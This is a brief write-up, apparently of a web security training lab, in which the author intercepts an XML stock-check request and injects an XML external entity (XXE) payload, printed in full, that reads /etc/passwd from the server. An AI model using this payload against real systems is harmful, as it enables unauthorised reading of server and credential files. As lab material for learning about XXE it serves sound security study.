While clicking the Check Stock button and intercepting the request, we observed that the POST request was sent in XML format.

We injected a simple payload to exploit XXE and successfully read the internal file /etc/passwd, which allowed us to solve the lab.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<stockCheck>
  <productId>&xxe;</productId>
  <storeId>1</storeId>
</stockCheck>